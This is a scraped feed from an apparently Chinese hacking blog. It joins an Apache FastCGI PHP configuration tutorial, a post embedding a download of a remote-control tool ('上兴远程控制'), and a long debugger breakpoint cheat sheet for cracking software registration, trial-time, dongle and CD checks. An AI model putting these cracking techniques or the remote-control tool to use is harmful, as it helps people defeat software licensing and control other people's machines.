italic;'>#!/bin/bash</span><br/><span style='color: #666666; font-style: italic;'># Shell Script To Run PHP5 using mod_fastcgi under Apache 2.x</span><br/><span style='color: #666666; font-style: italic;'># Tested under Red Hat Enterprise Linux / CentOS 5.x</span><br/><span style='color: #666666; font-style: italic;'>### Set PATH ###</span><br/><span style='color: #007800;'>PHP_CGI</span>=<span style='color: #000000; font-weight: bold;'>/</span>usr<span style='color: #000000; font-weight: bold;'>/</span>bin<span style='color: #000000; font-weight: bold;'>/</span>php-cgi<br/><span style='color: #007800;'>PHP_FCGI_CHILDREN</span>=<span style='color: #000000;'>4</span><br/><span style='color: #007800;'>PHP_FCGI_MAX_REQUESTS</span>=<span style='color: #000000;'>1000</span><br/><span style='color: #666666; font-style: italic;'>### no editing below ###</span><br/><span style='color: #7a0874; font-weight: bold;'>export</span> PHP_FCGI_CHILDREN<br/><span style='color: #7a0874; font-weight: bold;'>export</span> PHP_FCGI_MAX_REQUESTS<br/><span style='color: #7a0874; font-weight: bold;'>exec</span> <span style='color: #007800;'>$PHP_CGI</span></pre></td></tr></table></div><br/><br/><p>Set permission, type:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666;'># </span><span style='color: #c20cb9; font-weight: bold;'>chmod</span> +x <span style='color: #000000; font-weight: bold;'>/</span>var<span style='color: #000000; font-weight: bold;'>/</span>www<span style='color: #000000; font-weight: bold;'>/</span>cgi-bin<span style='color: #000000; font-weight: bold;'>/</span>php.fcgi</pre></td></tr></table></div><br/><br/><p>Finally, modify documentroot directory permission as follows. You need to use AddHandler and Action directives for mod_fastcgi:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/>8<br/>9<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'> <span style='color: #000000; font-weight: bold;'><</span>directory <span style='color: #ff0000;'>"/var/www/html"</span><span style='color: #000000; font-weight: bold;'>></span><br/> Options <span style='color: #660033;'>-Indexes</span> FollowSymLinks +ExecCGI<br/> AllowOverride AuthConfig FileInfo<br/> AddHandler php5-fastcgi .php<br/> Action php5-fastcgi <span style='color: #000000; font-weight: bold;'>/</span>cgi-bin<span style='color: #000000; font-weight: bold;'>/</span>php.fcgi<br/> DirectoryIndex index.php index.html<br/> Order allow,deny<br/> Allow from all<br/><span style='color: #000000; font-weight: bold;'></</span>directory<span style='color: #000000; font-weight: bold;'>></span></pre></td></tr></table></div><br/><br/><p>Where,<br/><br/>AddHandler php5-fastcgi .php : To configure Apache to handle php files (within the scope of the directive) with the specified extension(s) as FastCGI applications.<br/><br/>Action php5-fastcgi /cgi-bin/php.fcgi : This directive adds an action, which will activate cgi-script when action-type is triggered by the request. The cgi-script is the URL-path to a resource that has been configured as a CGI script using ScriptAlias. In our case, requests for files with a .php file extension of are handled instead by the specified cgi script /cgi-bin/php.fcgi.</p><br/><p>Save and close the file. Restart httpd:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666;'># </span>service httpd restart</pre></td></tr></table></div><br/><br/><p>mod_fastcgi virtual hosting configuration<br/><br/>Domain name: nixcraft.com<br/><br/>DocumentRoot: /websites/home/nixcraft.com/http<br/><br/>cgi-bin directory: /websites/home/nixcraft.com/cgi-bin<br/><br/>php.fcgi path: /websites/home/nixcraft.com/cgi-bin/php.fcgi<br/><br/>Logs file directory: /websites/home/nixcraft.com/logs</p><br/><p>Based upon above settings your virtualhosting configuration for nixcraft.com domain should look like as follows:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/>8<br/>9<br/>10<br/>11<br/>12<br/>13<br/>14<br/>15<br/>16<br/>17<br/>18<br/>19<br/>20<br/>21<br/>22<br/>23<br/>24<br/>25<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #000000; font-weight: bold;'><</span>virtualhost <span style='color: #000000; font-weight: bold;'>*</span>:<span style='color: #000000;'>80</span><span style='color: #000000; font-weight: bold;'>></span><br/> ServerAdmin webmaster<span style='color: #000000; font-weight: bold;'>@</span>nixcraft.com<br/> DocumentRoot <span style='color: #ff0000;'>"/websites/home/nixcraft.com/http"</span><br/> ServerName nixcraft.com<br/> ServerAlias www.nixcraft.com<br/> ErrorLog <span style='color: #ff0000;'>"/websites/home/nixcraft.com/logs/error.log"</span><br/> CustomLog <span style='color: #ff0000;'>"/websites/home/nixcraft.com/logs/access.log"</span> common<br/> ScriptAlias <span style='color: #000000; font-weight: bold;'>/</span>cgi-bin<span style='color: #000000; font-weight: bold;'>/</span> <span style='color: #ff0000;'>"/websites/home/nixcraft.com/cgi-bin/"</span><br/> <br/> <span style='color: #000000; font-weight: bold;'><</span>directory <span style='color: #ff0000;'>"/websites/home/nixcraft.com/http"</span><span style='color: #000000; font-weight: bold;'>></span><br/> Options <span style='color: #660033;'>-Indexes</span> FollowSymLinks +ExecCGI<br/> AllowOverride AuthConfig FileInfo<br/> AddHandler php5-fastcgi .php<br/> Action php5-fastcgi <span style='color: #000000; font-weight: bold;'>/</span>cgi-bin<span style='color: #000000; font-weight: bold;'>/</span>php.fcgi<br/> Order allow,deny<br/> Allow from all<br/> <span style='color: #000000; font-weight: bold;'></</span>directory<span style='color: #000000; font-weight: bold;'>></span><br/> <br/> <span style='color: #000000; font-weight: bold;'><</span>directory <span style='color: #ff0000;'>"/websites/home/nixcraft.com/cgi-bin"</span><span style='color: #000000; font-weight: bold;'>></span><br/> AllowOverride None<br/> Options None<br/> Order allow,deny<br/> Allow from all<br/> <span style='color: #000000; font-weight: bold;'></</span>directory<span style='color: #000000; font-weight: bold;'>></span><br/><span style='color: #000000; font-weight: bold;'></</span>virtualhost<span style='color: #000000; font-weight: bold;'>></span></pre></td></tr></table></div><br/><br/><p>Create a /websites/home/nixcraft.com/cgi-bin/php.fcgi as follows:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666; font-style: italic;'>#!/bin/bash</span><br/><span style='color: #007800;'>PHP_CGI</span>=<span style='color: #000000; font-weight: bold;'>/</span>usr<span style='color: #000000; font-weight: bold;'>/</span>bin<span style='color: #000000; font-weight: bold;'>/</span>php-cgi<br/><span style='color: #007800;'>PHP_FCGI_CHILDREN</span>=<span style='color: #000000;'>4</span><br/><span style='color: #007800;'>PHP_FCGI_MAX_REQUESTS</span>=<span style='color: #000000;'>1000</span><br/><span style='color: #7a0874; font-weight: bold;'>export</span> PHP_FCGI_CHILDREN<br/><span style='color: #7a0874; font-weight: bold;'>export</span> PHP_FCGI_MAX_REQUESTS<br/><span style='color: #7a0874; font-weight: bold;'>exec</span> <span style='color: #007800;'>$PHP_CGI</span></pre></td></tr></table></div><br/><br/><p>Set permission and restart httpd:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/>2<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666; font-style: italic;'># chmod +x /websites/home/nixcraft.com/cgi-bin/php.fcgi</span><br/><span style='color: #666666; font-style: italic;'># service httpd restart</span></pre></td></tr></table></div><br/><br/><p>Link:<a target='_blank' href='http://www.cyberciti.biz/tips/rhel-centos-fedora-apache2-fastcgi-php-configuration.html'>http://www.cyberciti.biz/tips/rhel-centos-fedora-apache2-fastcgi-php-configuration.html</a></p><br/><br/><div style='font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both;'/> <br/><a href='http://spyinsight.com/2013/04/centos-apache-2-fastcgi/'>CentOS Apache 2 FastCGI</a>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-42442388883617064582013-04-17T16:30:00.001+08:002013-04-17T16:30:23.842+08:00Open Sources<p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/04/code.png'><img height='557' width='644' src='http://www.h4ck.org.cn/wp-content/uploads//2013/04/code.png' alt='code' class='alignnone wp-image-5111'/></a></p><br/><p>至于开源的东西,其实自己也蛮想做的。但是苦于技术水平不够,所以一直也没什么东西公布。刚开始的时候代码都是托管在Googlecode, 后来迁移到了github,但是苦于github不能创建私有项目,于是最后选择了bitbucket上,另外一个好处是可以绑定域名。于是以后有代码公布的话,可以访问这个网址访问<a target='_blank' href='http://code.h4ck.org.cn'>http://code.h4ck.org.cn</a>。</p><br/><br/><div style='font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both;'/> <br/><a href='http://www.h4ck.org.cn/2013/04/open-sources/'>Open Sources</a>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-63178459384522444092013-04-15T15:52:00.001+08:002013-04-15T15:52:48.121+08:00Test Post from ç�«æ��ä¿¡æ�¯å®�å�¨ç �究é�¢<p>Test Post from 火星信息安全研究院 http://h4ck.ws</p>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-52237385718086410042009-12-15T15:33:00.003+08:002009-12-15T15:41:51.007+08:00本博客停止更新,请访问新博客-火星黑客研究院<div>由于共产党的GFW对blogger的封锁,现在维护这个博客颇为困难。故停止本博客的更新,需要更新的文章请访问我现在的博客</div><br /><br /><div><a href="http://www.h4ck.org.cn/"><span style="font-size:180%;color:#993399;">火星黑客研究院</span></a><span style="font-size:180%;color:#993399;"> </span></div><br /><br /><div><a href="http://www.h4ck.org.cn/"><span style="font-size:180%;color:#993399;">http://www.h4ck.org.cn</span></a><span style="font-size:180%;"> </span></div><br /><br /><div>以下为网站截图:</div><br /><a href="http://2.bp.blogspot.com/_r8EaiijILzk/Syc9nfcnqAI/AAAAAAAAFz4/x4S4POimMs4/s1600-h/h4ck.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 195px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5415364825602041858" border="0" alt="" src="http://2.bp.blogspot.com/_r8EaiijILzk/Syc9nfcnqAI/AAAAAAAAFz4/x4S4POimMs4/s320/h4ck.png" /></a><br /><div><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src="http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif" /></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src="http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg" /></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src="http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg" /></a> </div>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com39tag:blogger.com,1999:blog-3777450046188403147.post-11923766397160124502009-07-20T12:45:00.002+08:002009-07-20T13:00:07.634+08:00上兴远程控制20090701<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_r8EaiijILzk/SmP5xRZ9lYI/AAAAAAAAFuM/lc48MkAjQRU/s1600-h/shangxing.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 236px;" src="http://4.bp.blogspot.com/_r8EaiijILzk/SmP5xRZ9lYI/AAAAAAAAFuM/lc48MkAjQRU/s320/shangxing.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5360402606382224770" /></a><br /><br /><iframe scrolling="no" marginheight="0" marginwidth="0" frameborder="0" style="width:240px;height:66px;margin:3px;padding:0;border:1px solid #dde5e9;background-color:#ffffff;" src="http://cid-16507ea1777422ae.skydrive.live.com/embedrowdetail.aspx/.Public/%e8%bf%9c%e7%a8%8b%e6%8e%a7%e5%88%b6/%e4%b8%8a%e5%85%b4%e8%bf%9c%e7%a8%8b%e6%8e%a7%e5%88%b620090701.rar"></iframe><br /><span class="fullpost"><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com2tag:blogger.com,1999:blog-3777450046188403147.post-37805384500614026442009-07-18T20:17:00.000+08:002009-07-18T20:18:53.706+08:00OD常用断点 ^_^ 很全很全常用断点(1) <br /><br />拦截窗口: <br />bp CreateWindow 创建窗口 <br />bp CreateWindowEx(A) 创建窗口 <br />bp ShowWindow 显示窗口 <br />bp UpdateWindow 更新窗口 <br />bp GetWindowText(A) 获取窗口文本 <br /><br /><br />拦截消息框: <br />bp MessageBox(A) 创建消息框 <br />bp MessageBoxExA 创建消息框 <br />bp MessageBoxIndirect(A) 创建定制消息框 <br />bp IsDialogMessageW <br /><br /><br />拦截警告声: <br />bp MessageBeep 发出系统警告声(如果没有声卡就直接驱动系统喇叭发声) <br /><br /><br />拦截对话框: <br />bp DialogBox 创建模态对话框 <br />bp DialogBoxParam(A) 创建模态对话框 <br />bp DialogBoxIndirect 创建模态对话框 <br />bp DialogBoxIndirectParam(A) 创建模态对话框 <br />bp CreateDialog 创建非模态对话框 <br />bp CreateDialogParam(A) 创建非模态对话框 <br />bp CreateDialogIndirect 创建非模态对话框 <br />bp CreateDialogIndirectParam(A) 创建非模态对话框 <br />bp GetDlgItemText(A) 获取对话框文本 <br />bp GetDlgItemInt 获取对话框整数值 <br /><br /><span class="fullpost"><br />拦截剪贴板: <br />bp GetClipboardData 获取剪贴板数据 <br /><br /><br />拦截注册表: <br />bp RegOpenKey(A) 打开子健 <br />bp RegOpenKeyEx 打开子健 <br />bp RegQueryValue(A) 查找子健 <br />bp RegQueryValueEx 查找子健 <br />bp RegSetValue(A) 设置子健 <br />bp RegSetValueEx(A) 设置子健 <br /><br /><br />功能限制拦截断点: <br />bp EnableMenuItem 禁止或允许菜单项 <br />bp EnableWindow 禁止或允许窗口 <br /><br /><br />拦截时间: <br />bp GetLocalTime 获取本地时间 <br />bp GetSystemTime 获取系统时间 <br />bp GetFileTime 获取文件时间 <br />bp GetTickCount 获得自系统成功启动以来所经历的毫秒数 <br />bp GetCurrentTime 获取当前时间(16位) <br />bp SetTimer 创建定时器 <br />bp TimerProc 定时器超时回调函数 <br />GetDlgItemInt 得指定输入框整数值 <br />GetDlgItemText 得指定输入框输入字符串 <br />GetDlgItemTextA 得指定输入框输入字符串 <br /><br /><br />拦截文件: <br />bp CreateFileA 创建或打开文件 (32位) <br />bp OpenFile 打开文件 (32位) <br />bp ReadFile 读文件 (32位) <br />bp WriteFile 写文件 (32位) <br />GetModuleFileNameA <br />GetFileSize <br />Setfilepointer <br />fileopen <br />FindFirstFileA <br />ReadFile <br /><br />拦截驱动器: <br />bp GetDriveTypeA 获取磁盘驱动器类型 <br />bp GetLogicalDrives 获取逻辑驱动器符号 <br />bp GetLogicalDriveStringsA 获取当前所有逻辑驱动器的根驱动器路径 <br /><br /><br />★★VB程序专用断点★★ <br /><br /><br />文件长度:RtcFileLen <br />bp __vbaFreeStr 对付VB程序重启验证 <br />bp __vbaStrCmp 比较字符串是否相等 <br />bp __vbaStrComp 比较字符串是否相等 <br />bp __vbaVarTstNe 比较变量是否不相等 <br />bp __vbaVarTstEq 比较变量是否相等 <br />bp __vbaStrCopy 复制字符串 <br />bp __vbaStrMove 移动字符串 <br />bp MultiByteToWideChar ANSI字符串转换成Unicode字符串 <br />bp WideCharToMultiByte Unicode字符串转换成ANSI字符串 <br /><br />=============== ================ <br /><br />密码常用中断 <br />Hmemcpy (win9x专用) <br />GetDlgItemTextA <br />GetDlgItemInt <br />vb: <br />getvolumeinformationa <br /><br />vbastrcomp (trw) <br />Bpx __vbaStrComp (记得是两个 '_') <br />MSVBVM60!_vbastrcomp|sofice <br />MSVBVM50! | <br /><br />VBAI4STR <br /><br />Ctrl+D <br />bpx msvbvm60!__vbastrcomp do "d *(esp+0c)"(softice) <br />按几次F5出册码出来了。 <br />bpx regqueryvalueexa do "d esp->8"(trw) <br /><br />vbaVarTstEq 判断是否注册的函数 <br />(0042932F 66898580FEFFFF mov word ptr [ebp+FFFFFE80], ax <br />改为0042932F 66898580FEFFFF mov word ptr [ebp+FFFFFE80], bx) <br /><br />时间常用中断 <br />GetSystemTime <br />GetLocalTime <br />GetTickCount <br />vb: <br />rtcGetPresentDate //取得当前日期 <br /><br />杀窗常用中断 <br />Lockmytask (win9x专用) <br />bp ExitProcess 退出进程 <br />DestroyWindow <br />mouse_event (鼠标中断) <br />postquitmessage (Cracking足彩xp,很有用^_^) <br />vb: <br />_rtcMsgBox <br /><br />ini文件内容常用中断 <br />GetPrivateProfileStringA <br />GetPrivateProfileProfileInt <br /><br />key文件: <br />getprivateprofileint <br />ReadFile <br />CreateFileA <br /><br />注册表常用中断 <br />RegQueryvalueA <br />RegQueryvalueExA <br /><br />狗加密中断 <br />BPIO -h 278 R <br />BPIO -h 378 R <br /><br />其它常用函数断点 <br />CreateFileA (读狗驱动程序), <br />DeviceIOControl, <br />FreeEnvironmentStringsA (对付HASP非常有效). <br />Prestochangoselector (16-bit HASP's), '7242' 查找字符串 (对付圣天诺).具体含义参考下面的范例。 <br /><br />光盘破解中断 <br />16: <br />getvolumeinformation <br />getdrivetype <br />int 2fh (dos) <br />32: <br />GetDriveTypeA <br />GetFullPathNameA <br />GetWindowsDirectoryA <br /><br />读磁盘中断 <br />GETLASTERROR 返回扩充出错代码 <br /><br />限制中断 <br />EnableMenuItem 允许、禁止或变灰指定的菜单条目 <br />EnableWindow 允许或禁止鼠标和键盘控制指定窗口和条目(禁止时菜单变灰) <br /><br />不知道软盘中断是什么了?还有其它特殊中断,不知道其他朋友可否说一下了? <br />如ockmytask and mouse_event,这些就不是api32函数? <br />win9x 与 win2k进行破解,以上中断有部分已经不能用了? <br />不知道在win2k上,以上常用中断函数是什么了? <br />也就是问密码、时间、窗口、ini、key、注册表、加密狗、光盘、软盘、限制等! <br />了解常用的中断,对破解分析可以做到事半功倍! <br />请大家说一下!还有如何破解了某个软件时,一重启就打回原形? <br />不知道下什么中断了?可以分为三种情况: <br />1.比较可能在注册表中 <br />2.比较在特殊文件(*.key *.ini *.dat等) <br />3.比较在程序中,没有任何错误提示或者反译也找不到明显字符(这个就是我想问的) <br /><br />还有一个是最难的,就是去掉水印! <br />也可以三种情况: <br />A.水印是位图文件(bitblt,creatBITMAP等位图函数) <br />B.水印是明显字符(反译分析) <br />C.水印不是明显字符(如:This a demo!它只是显示在另一个制作文件上,可是*.htm *.exe等) <br />C.才是最难搞,也是很多人想知道的!包括我在内。不知道高手们有何提示了? <br /><br />广告条: <br />可以分两种情况: <br />A.从创建窗口进手,可以用到movewindow或者其它窗口函数! <br />B.从位图进手,也可以用到bitblt或者其它位图函数! <br />最后可以借助一些现有工具(如:api27,vwindset,freespy之类的工具) <br /><br />葡萄虽无树,藤生棚中秧。 <br />人处凡尘中,岂不惹尘埃? <br /><br />小球[CCG] <br />那要看是在哪作的标记,通常是在注册表中留下信息! <br />在softice中就要用bpx regqueryvalueexa do "d esp->8"来中断看看, <br />在trw中要用bpx regqueryvalueexa do "d*(esp+8)"来中断看看。 <br />还有的是在本目录下留下注册信息,常见的有.dat .ini .dll等等, <br />我是用bpx readfile来中断的,还有的是在windows目录下留下注册信息。 <br />你可以借助专用的工具帮助你查看,入filemon等! <br /><br />vb: <br /><br />1、__vbaVarTstNe //比较两个变量是否不相等 <br />2、rtcR8ValFromBstr //把字符串转换成浮点数 <br />3、rtcMsgBox 显示一信息对话框 <br />4、rtcBeep //让扬声器叫唤 <br />5、rtcGetPresentDate //取得当前日期 <br /><br />针对字串: <br />__vbaStrComp <br />__vbaStrCmp <br />__vbaStrCompVar <br />__vbaStrLike <br />__vbaStrTextComp <br />__vbaStrTextLike <br />针对变量: <br />__vbaVarCompEq <br />__vbaVarCompLe <br />__vbaVarCompLt <br />__vbaVarCompGe <br />__vbaVarCompGt <br />__vbaVarCompNe <br /><br />常用断点(2) <br /><br />VB的指针: <br />THROW <br /><br />VB DLL还调用了oleauto32.dll中的部分函数。oleauto32.dll是个通用的proxy/stub DLL,其每个函数的原型在<oleauto.h>中定义,并在MSDN中有详细描述。这也有助于理解VB DLL中的函数的作用。 <br /><br />举例: <br /><br />LEA EAX, [EBP-58] <br />PUSH EAX <br />CALL [MSVBVM60!__vbaI4Var] <br /><br />执行call之前敲dd eax+8,得到的值为3; <br />执行完call之后,eax = 3 <br />从而可知__vbaI4Var的作用是将一个VARIANT转换为I4(即一个长整数)。 <br /><br />__vbaVarTstNe似乎是用来进行自校验的,正常情况下返回值为0。 <br />已知适用的软件有:网络三国智能机器人、音乐贺卡厂。当这两个软件被脱壳后都回出错,网络三国智能机器人会产生非法*作,而音乐贺卡厂会告诉你是非法拷贝,通过修改__vbaVarTstNe的返回值都可让它们正常运行。 <br />所以当您遇到一个VB软件,脱壳后无法正常运行,而又找不出其它问题时,可试试拦截这个函数,说不定会有用哦。8-) <br /><br />API不太知道,也许可以通过BIOS在98平台上读写扇区,不过在2000/NT下可以通过内黑ATAPI,HAL写扇区 <br />machoman[CCG] <br />bpx WRITE_PORT_BUFFER_USHORT <br />NT/2000下这个断点,当edx=1f0h,时,可以看见EDI地址内数据为扇区位置数据,必须先 在winice.dat 中装入hal.sys 详细内容看ATAPI手册 <br /><br />补充篇: <br />关于对VB程序和时间限制程序的断点 <br />CrackerABC <br />先给出修改能正确反编译VB程序的W32DASM的地址: <br />====================== <br />offsets 0x16B6C-0x16B6D <br /><br />修改机器码为: 98 F4 <br />====================== <br /><br />VB程序的跟踪断点: <br /><br />============ <br />MultiByteToWideChar, <br />rtcR8ValFromBstr, <br />WideCharToMultiByte, <br />__vbaStrCmp <br />__vbaStrComp <br />__vbaStrCopy <br />__vbaStrMove <br />__vbaVarTstNe <br />rtcBeep <br />rtcGetPresentDate (时间API) <br />rtcMsgBox <br />========= <br /><br />时间限制断点: <br /><br />================ <br />CompareFileTime <br />GetLocalTime <br />GetSystemTime <br />GetTimeZoneInformation <br />msvcrt.diffTime() <br />msvcrt.Time() <br />================ <br /><br />一般处理 <br /><br />bpx hmemcpy <br />bpx MessageBox <br />bpx MessageBoxExA <br />bpx MessageBeep <br />bpx SendMessage <br /><br />bpx GetDlgItemText <br />bpx GetDlgItemInt <br />bpx GetWindowText <br />bpx GetWindowWord <br />bpx GetWindowInt <br />bpx DialogBoxParamA <br />bpx CreateWindow <br />bpx CreateWindowEx <br />bpx ShowWindow <br />bpx UpdateWindow <br /><br />bmsg xxxx wm_move <br />bmsg xxxx wm_gettext <br />bmsg xxxx wm_command <br />bmsg xxxx wm_activate <br /><br />时间相关 <br />bpint 21 if ah==2A (DOS) <br />bpx GetLocalTime <br />bpx GetFileTime <br />bpx GetSystemtime <br /><br />CD-ROM 或 磁盘相关 <br />bpint 13 if ah==2 (DOS) <br />bpint 13 if ah==3 (DOS) <br />bpint 13 if ah==4 (DOS) <br />bpx GetFileAttributesA <br />bpx GetFileSize <br />bpx GetDriveType <br />bpx GetLastError <br />bpx ReadFile <br />bpio -h (Your CD-ROM Port Address) R <br /><br />软件狗相关 <br />bpio -h 278 R <br />bpio -h 378 R <br /><br />键盘输入相关 <br />bpint 16 if ah==0 (DOS) <br />bpint 21 if ah==0xA (DOS) <br /><br />文件访问相关 <br />bpint 21 if ah==3dh (DOS) <br />bpint 31 if ah==3fh (DOS) <br />bpint 21 if ah==3dh (DOS) <br />bpx ReadFile <br />bpx WriteFile <br />bpx CreateFile <br />bpx SetFilePointer <br />bpx GetSystemDirectory <br /><br />INI 初始化文件相关 <br />bpx GetPrivateProfileString <br />bpx GetPrivateProfileInt <br />bpx WritePrivateProfileString <br />bpx WritePrivateProfileInt <br /><br />注册表相关 <br />bpx RegCreateKey <br />bpx RegDeleteKey <br />bpx RegQueryvalue <br />bpx RegCloseKey <br />bpx RegOpenKey <br /><br />注册标志相关 <br />bpx cs:eip if EAX==0 <br /><br />内存标准相关 <br />bpmb cs:eip rw if 0x30:0x45AA==0 <br /><br />显示相关 <br />bpx 0x30:0x45AA do "d 0x30:0x44BB" <br />bpx CS:0x66CC do "? EAX" <br /><br />查找窗口 <br />FindWindowA <br /><br />BP SetFilePointer <br /><br /><br />bpx hmemcpy ;破解万能断点,拦截内存拷贝动作(注意:Win9x专用断点) <br />bpx Lockmytask ;当你用其它断点都无效时可以试一下,这个断点拦截按键的动作(Win9x专用) <br /><br /><br />实在找不到断点可以试下面的方法: <br /><br />bmsg handle wm_gettext ;拦截注册码(handle为对应窗口的句柄) <br />bmsg handle wm_command ;拦截OK按钮(handle为对应窗口的句柄) <br /><br /><br />拦截窗口: <br /><br />bpx CreateWindow ;创建窗口 <br />bpx CreateWindowEx(A/W) ;创建窗口 <br />bpx ShowWindow ;显示窗口 <br />bpx UpdateWindow ;更新窗口 <br />bpx GetWindowText(A/W) ;获取窗口文本 <br /><br /><br />拦截消息框: <br /><br />bpx MessageBox(A/W) ;创建消息框 <br />bpx MessageBoxExA(W) ;创建消息框 <br />bpx MessageBoxIndirect(A/W) ;创建定制消息框 <br /><br />拦截警告声: <br /><br />bpx MessageBeep ;发出系统警告声(如果没有声卡就直接驱动系统喇叭发声) <br /><br />拦截对话框: <br /><br />bpx DialogBox ;创建模态对话框 <br />bpx DialogBoxParam(A/W) ;创建模态对话框 <br />bpx DialogBoxIndirect ;创建模态对话框 <br />bpx DialogBoxIndirectParam(A/W) ;创建模态对话框 <br />bpx CreateDialog ;创建非模态对话框 <br />bpx CreateDialogParam(A/W) ;创建非模态对话框 <br />bpx CreateDialogIndirect ;创建非模态对话框 <br />bpx CreateDialogIndirectParam(A/W) ;创建非模态对话框 <br />bpx GetDlgItemText(A/W) ;获取对话框文本 <br />bpx GetDlgItemInt ;获取对话框整数值 <br /><br />拦截剪贴板: <br /><br />bpx GetClipboardData ;获取剪贴板数据 <br /><br />拦截注册表: <br /><br />bpx RegOpenKey(A/W) ;打开子健 ( 例:bpx RegOpenKey(A) if *(esp->8)=='****' ) <br />bpx RegOpenKeyExA(W) ;打开子健 ( 例:bpx RegOpenKeyEx if *(esp->8)=='****' ) <br />bpx RegQueryValue(A/W) ;查找子健 ( 例:bpx RegQueryValue(A) if *(esp->8)=='****' ) <br />bpx RegQueryValueEx(A/W) ;查找子健 ( 例:bpx RegQueryValueEx if *(esp->8)=='****' ) <br />bpx RegSetValue(A/W) ;设置子健 ( 例:bpx RegSetValue(A) if *(esp->8)=='****' ) <br />bpx RegSetValueEx(A/W) ;设置子健 ( 例:bpx RegSetValueEx(A) if *(esp->8)=='****' ) <br /><br />注意:'****'为指定子键名的前4个字符,如子键为'Regcode',则'****'= 'Regc' <br /><br /><br />功能限制拦截断点: <br /><br />bpx EnableMenuItem ;禁止或允许菜单项 <br />bpx EnableWindow ;禁止或允许窗口 <br />bmsg hMenu wm_command ;拦截菜单按键事件,其中hMenu为菜单句柄 <br />bpx K32Thk1632Prolog ;配合bmsg hMenu wm_command使用,可以通过这个断点进入菜单处理程序 <br />应用示例: <br />CALL [KERNEL32!K32Thk1632Prolog] <br />CALL [......] <-- 由此跟踪进入菜单处理程序 <br />CALL [KERNEL32!K32Thk1632Epilog] <br /><br /> <br /><br />拦截时间: <br /><br />bpx GetLocalTime ;获取本地时间 <br />bpx GetSystemTime ;获取系统时间 <br />bpx GetFileTime ;获取文件时间 <br />bpx GetTickCount ;获得自系统成功启动以来所经历的毫秒数 <br />bpx GetCurrentTime ;获取当前时间(16位) <br />bpx SetTimer ;创建定时器 <br />bpx TimerProc ;定时器超时回调函数 <br /><br />拦截文件: <br /><br />bpx CreateFileA(W) ;创建或打开文件 (32位) <br />bpx OpenFile ;打开文件 (32位) <br />bpx ReadFile ;读文件 (32位) <br />bpx WriteFile ;写文件 (32位) <br />bpx _lcreat ;创建或打开文件 (16位) <br />bpx _lopen ;打开文件 (16位) <br />bpx _lread ;读文件 (16位) <br />bpx _lwrite ;写文件 (16位) <br />bpx _hread ;读文件 (16位) <br />bpx _hwrite ;写文件 (16位) <br /><br />拦截驱动器: <br /><br />bpx GetDrivetype(A/W) ;获取磁盘驱动器类型 <br />bpx GetLogicalDrives ;获取逻辑驱动器符号 <br />bpx GetLogicalDriveStringsA(W) ;获取当前所有逻辑驱动器的根驱动器路径 <br /><br />拦截狗: <br /><br />bpio -h 378(或278、3BC) R ;378、278、3BC是并行打印端口 <br />bpio -h 3F8(或2F8、3E8、2E8) R ;3F8、2F8、3E8、2E8是串行端口 <br /><br />VB程序专用断点: <br /><br />bpx 